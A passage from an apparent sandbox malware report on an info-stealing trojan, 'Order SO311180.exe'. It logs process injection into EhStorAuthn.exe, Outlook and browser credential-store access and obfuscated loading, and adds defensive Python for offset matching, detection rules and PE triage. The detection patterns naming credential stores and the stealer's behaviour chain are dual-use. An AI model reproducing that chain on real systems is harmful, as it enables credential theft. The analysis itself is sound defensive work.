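    return {d - a for a, count in strfuncs[src_image] for d in by_count.get(count, ())}

def injection_apis(funcs, image):
    return sorted({api for _, api in funcs[image] if api in INJECTION_APIS})

def analyze(lines, src_image="Order SO311180.exe", dst_image="EhStorAuthn.exe"):
    funcs, strfuncs = parse(lines)
    delta, matched, total = relocation_delta(funcs, src_image, dst_image)
    return {"delta": delta, "matched": matched, "total": total,
            "string_deltas": string_function_deltas(strfuncs, src_image, dst_image),
            "injection_apis": {i: injection_apis(funcs, i) for i in (src_image, dst_image)}}

if __name__ == "__main__":
    r = analyze(REPORT_LINES)
    print(f"delta 0x{r['delta']:08X}: {r['matched']}/{r['total']} stage-3 functions "
          f"found in EhStorAuthn.exe at that offset")
    print("string-helper deltas:", sorted(f"0x{d:08X}" for d in r["string_deltas"]))
    for image, apis in r["injection_apis"].items():
        print(f"{image}: {', '.join(apis)}")
```

On the full report the same check gives one dominant offset of 0x03770000 with essentially every process-3 function matched, which is what one image copied whole into a second process looks like; the EhStorAuthn.exe stubs that do not match the offset (the 0x030C8xxx NtCreateFile, NtReadFile, NtDeleteFile, NtAllocateVirtualMemory and NtClose entries) belong to a separate region of that process and are worth treating as a second stage when carving memory.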
Source: Order SO311180.exe, 00000000.00000002.2232231434.000000000B150000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Order SO311180.exe
Source: Order SO311180.exe, 00000000.00000002.2212037230.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Order SO311180.exe
Source: Order SO311180.exe, 00000003.00000002.2685987048.000000000142A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameEhStorAuthn.exej% vs Order SO311180.exe
Source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameEhStorAuthn.exej% vs Order SO311180.exe
Source: Order SO311180.exe, 00000003.00000002.2686263558.000000000197D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Order SO311180.exe
Source: Order SO311180.exe Binary or memory string: OriginalFilenameAzqa.exe8 vs Order SO311180.exe
Source: Order SO311180.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Order SO311180.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.SetAccessControl
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.AddAccessRule
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.SetAccessControl
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.AddAccessRule
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.SetAccessControl
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.AddAccessRule
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/3
Source: C:\Users\user\Desktop\Order SO311180.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order SO311180.exe.log
Source: C:\Users\user\Desktop\Order SO311180.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File created: C:\Users\user\AppData\Local\Temp\s002-5p
Source: Order SO311180.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Order SO311180.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3419665811.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2885611691.00000000033F3000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003418000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2883200340.00000000033E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Order SO311180.exe ReversingLabs: Detection: 52%
Source: unknown Process created: C:\Users\user\Desktop\Order SO311180.exe "C:\Users\user\Desktop\Order SO311180.exe"
Source: C:\Users\user\Desktop\Order SO311180.exe Process created: C:\Users\user\Desktop\Order SO311180.exe "C:\Users\user\Desktop\Order SO311180.exe"
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Order SO311180.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Order SO311180.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
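The process chain recorded above (Order SO311180.exe re-launching itself with an identical command line, EhStorAuthn.exe started from a random-named Program Files (x86) directory, then EhStorAuthn.exe launching Firefox) and the credential-store accesses (the Outlook Profiles key opened by EhStorAuthn.exe, Firefox's profiles.ini, the Chromium Login Data `password_notes` schema found in EhStorAuthn.exe memory) translate directly into endpoint detection logic. The script below is an added example written for this page, not sandbox output: the events are constructed from the report's paths using Sysmon-style field names that are assumed, and the browser/mail allow-lists, the launcher allow-list and the random-directory pattern are assumptions to tune per environment. The pdb path the report records for GfSuWuMUukRRDP.exe (FakeChrome\Release\Chrome.pdb) points to a sandbox browser decoy, so the rule keys on the directory pattern rather than on that file name.

```python
"""Behavioural rules for the process chain and credential-store accesses this report records.
Added example for this page, not sandbox output. Event shape (Sysmon-style field names), the
allow-lists and the random-directory pattern are assumptions to tune per environment."""
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
# System binaries that legitimately start browsers (assumed allow-list; explorer.exe lives in
# C:\Windows, outside SYSTEM_DIRS, so it never reaches rule 3 anyway).
BROWSER_LAUNCHERS = {"cmd.exe", "powershell.exe", "svchost.exe", "runtimebroker.exe"}
# A letters-only directory of 16+ characters directly under Program Files holding a
# letters-only .exe: the shape of EhStorAuthn.exe's parent in this report.
RANDOM_PF_EXE = re.compile(r"^c:\\program files( \(x86\))?\\[a-z]{16,}\\[a-z]{6,}\.exe$", re.I)
CREDENTIAL_STORES = (
    re.compile(r"\\mozilla\\firefox\\profiles\.ini$", re.I),               # Firefox profile index
    re.compile(r"\\user data\\[^\\]+\\login data$", re.I),                  # Chromium password DB
    re.compile(r"\\microsoft\\office\\\d+\.\d+\\outlook\\profiles", re.I),  # Outlook MAPI profiles
)


def base(path: str) -> str:
    return ntpath.basename(path).lower()          # ntpath: Windows paths on any host


def in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def check_process(ev):
    image, parent = ev["image"], ev["parent_image"]
    # 1. A user-writable binary re-spawning itself with its own command line: the suspended
    #    child is the usual target for hollowing / thread-context injection.
    if image.lower() == parent.lower() and ev["cmdline"] == ev["parent_cmdline"] and not in_system_dir(image):
        yield "self_spawn_identical_cmdline", f"{base(image)} re-launched itself"
    # 2. A SysWOW64/System32 binary started from a random-named Program Files directory.
    if in_system_dir(image) and RANDOM_PF_EXE.match(parent):
        yield "system_binary_from_random_dir", f"{base(image)} started by {parent}"
    # 3. A system binary that has no business launching a browser does so.
    if base(image) in BROWSERS and in_system_dir(parent) and base(parent) not in BROWSER_LAUNCHERS:
        yield "system_binary_spawns_browser", f"{base(parent)} launched {base(image)}"


def check_access(ev):
    # 4. Anything except the owning browser/mail client touching a credential store.
    if base(ev["image"]) in BROWSERS | MAIL_CLIENTS:
        return
    if any(p.search(ev["target"]) for p in CREDENTIAL_STORES):
        yield "credential_store_access", f"{base(ev['image'])} touched {ev['target']}"


def detect(events) -> list:
    """Return [(rule_name, detail), ...] for every rule that fires over the event stream."""
    hits = []
    for ev in events:
        if ev["type"] == "process_create":
            hits.extend(check_process(ev))
        elif ev["type"] in ("file_read", "registry_open"):
            hits.extend(check_access(ev))
    return hits


# Constructed events, built from the paths in this report.
ORDER = r"C:\Users\user\Desktop\Order SO311180.exe"
RANDOM_PF = r"C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe"
EHSTOR = r"C:\Windows\SysWOW64\EhStorAuthn.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
PROFILES_INI = r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"

SAMPLE_EVENTS = [
    {"type": "process_create", "image": ORDER, "cmdline": f'"{ORDER}"', "parent_image": ORDER, "parent_cmdline": f'"{ORDER}"'},
    {"type": "process_create", "image": EHSTOR, "cmdline": f'"{EHSTOR}"', "parent_image": RANDOM_PF, "parent_cmdline": f'"{RANDOM_PF}"'},
    {"type": "process_create", "image": FIREFOX, "cmdline": f'"{FIREFOX}"', "parent_image": EHSTOR, "parent_cmdline": f'"{EHSTOR}"'},
    {"type": "registry_open", "image": EHSTOR, "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook"},
    {"type": "file_read", "image": FIREFOX, "target": PROFILES_INI},   # browser reading its own profile: no alert
]
BENIGN_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe"},
    {"type": "file_read", "image": FIREFOX, "target": PROFILES_INI},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
    print("benign events:", detect(BENIGN_EVENTS))
```

Run against the sample stream, rules 1 to 4 each fire exactly once and the benign stream produces nothing; Firefox reading its own profiles.ini (the report's firefox.exe line) is deliberately not an alert, whereas the same read by EhStorAuthn.exe would be. Rule 4 is the one worth keeping even where the others are tuned down: a SysWOW64 binary with the Outlook profile key and a browser password database in hand is the credential-theft step itself, not a precursor.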
Source: Order SO311180.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Order SO311180.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: EhStorAuthn.pdbGCTL source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GfSuWuMUukRRDP.exe, 00000006.00000002.3420506622.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000000.2764840219.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Order SO311180.exe, Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.Order SO311180.exe.37b0b90.2.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs .Net Code: hc4jwue98X System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs .Net Code: hc4jwue98X System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.6c10000.3.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs .Net Code: hc4jwue98X System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAA102 push edx; ret 0_2_00BAA103
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAA150 push ebx; ret 0_2_00BAA15F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAC4E9 push cs; ret 0_2_00BAC4F6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA4659 push edx; retn 0004h 0_2_00BA465A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA47AF push esi; retn 0004h 0_2_00BA47B2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA4778 push esi; retn 0004h 0_2_00BA477A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAAC58 pushfd ; retn 0004h 0_2_00BAAC5A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA5913 pushfd ; ret 0_2_00BA5916
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C676A1 push esi; ret 0_2_06C676A2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6766B push esi; ret 0_2_06C67672
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67668 push esi; ret 0_2_06C6766A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C674DF push ebp; ret 0_2_06C674E2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C675C8 push esi; ret 0_2_06C675CA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C605EB push es; ret 0_2_06C605F2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67518 push ebp; ret 0_2_06C67522
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68223 pushad ; ret 0_2_06C6822A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68221 pushad ; ret 0_2_06C68222
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67383 push 5D906C66h; ret 0_2_06C6739B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C673A3 push edx; ret 0_2_06C673AA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C673A1 push edx; ret 0_2_06C673A2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C62348 push ds; ret 0_2_06C6237A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6737B push edx; ret 0_2_06C67382
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67378 push edx; ret 0_2_06C6737A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67303 push ecx; ret 0_2_06C6730A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67301 push edx; ret 0_2_06C67302
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67339 push edx; ret 0_2_06C6733A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C678E9 push edi; ret 0_2_06C678EA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6786F push esi; ret 0_2_06C67872
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F6C58 push cs; ret 0_2_0E1F6C66
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00425043 push edi; retf 3_2_0042504E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004190E7 push 0000006Ch; retf 3_2_00419103
Source: Order SO311180.exe Static PE information: section name: .text entropy: 7.957120614835864
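The static lines above (a .text section flagged IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ; an IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR marking a .NET image; DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE; and a .text entropy of 7.957 bits per byte) are what a first static pass extracts before any unpacking. The script below is an added example for this page, not sandbox code: it parses those fields with the standard library only and carves PE images out of a memory dump such as the raw.unpack regions the report names. The two images it inspects are built in memory by build_pe() (constructed test data, not real samples), and the 7.0 bits/byte cut-off for calling a section packed is an assumption.

```python
"""Static PE triage for the report's 'Static PE information' lines: section characteristics,
DllCharacteristics, the CLR (COM descriptor) directory that marks a .NET image, and
per-section Shannon entropy, plus a carver for PE images embedded in a memory dump.
Added example, not part of the report: the images are built in memory by build_pe() so the
script runs offline, and the 7.0 bits/byte 'packed' cutoff is an assumption."""
import hashlib
import math
import struct
from collections import Counter

DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
SECTION_FLAGS = {0x00000020: "IMAGE_SCN_CNT_CODE", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
                 0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE"}
COM_DESCRIPTOR = 14      # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
PACKED_ENTROPY = 7.0     # assumption: a code section this close to 8 bits/byte is packed or encrypted


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in table.items() if value & bit]


def parse_pe(img: bytes) -> dict:
    """Parse enough of a PE32/PE32+ image to answer the report's static questions."""
    if img[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    if img[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsections = struct.unpack_from("<H", img, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", img, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                   # IMAGE_OPTIONAL_HEADER
    pe32plus = struct.unpack_from("<H", img, opt)[0] == 0x20B
    dllchar = struct.unpack_from("<H", img, opt + 70)[0]  # same offset in PE32 and PE32+
    ndirs = struct.unpack_from("<I", img, opt + (108 if pe32plus else 92))[0]
    dd = opt + (112 if pe32plus else 96)                  # first IMAGE_DATA_DIRECTORY
    com_rva, com_size = struct.unpack_from("<II", img, dd + 8 * COM_DESCRIPTOR)
    sections = []
    for i in range(nsections):
        name, _, _, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", img, opt + opt_size + 40 * i)
        ent = shannon_entropy(img[rawptr:rawptr + rawsize])
        sections.append({"name": name.rstrip(b"\0").decode(), "flags": flag_names(chars, SECTION_FLAGS),
                         "entropy": round(ent, 3), "packed": ent >= PACKED_ENTROPY})
    return {"pe32plus": pe32plus, "dll_characteristics": flag_names(dllchar, DLL_CHARACTERISTICS),
            "is_dotnet": ndirs > COM_DESCRIPTOR and com_rva != 0 and com_size != 0,
            "sections": sections}


def carve_pe(blob: bytes) -> list:
    """Return (offset, parsed) for every embedded image whose MZ/PE headers parse."""
    found, pos = [], blob.find(b"MZ")
    while pos != -1:
        try:
            found.append((pos, parse_pe(blob[pos:])))
        except (ValueError, struct.error, UnicodeDecodeError):
            pass                                          # stray 'MZ' bytes, not a header
        pos = blob.find(b"MZ", pos + 1)
    return found


def build_pe(sections, dllchar=0, dotnet=False, align=0x200) -> bytes:
    """Assemble a minimal PE32 image from (name, characteristics, data) tuples (test data only)."""
    opt_size = 96 + 16 * 8
    hdr = -(-(0x40 + 24 + opt_size + 40 * len(sections)) // align) * align   # SizeOfHeaders
    table, body, rva, raw = b"", b"", 0x1000, hdr
    for name, chars, data in sections:
        data += b"\0" * (-len(data) % align)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data), rva,
                             len(data), raw, 0, 0, 0, 0, chars)
        body, rva, raw = body + data, rva + -(-len(data) // 0x1000) * 0x1000, raw + len(data)
    dirs = [(0, 0)] * 16
    if dotnet:
        dirs[COM_DESCRIPTOR] = (0x2008, 0x48)             # where IMAGE_COR20_HEADER would live
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", 0x10B, 0, 0, 0, 0, 0, 0x1000, 0x1000, 0x2000,
                      0x400000, 0x1000, align, 6, 0, 0, 0, 6, 0, 0, rva, hdr, 0, 2, dllchar,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    head = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"
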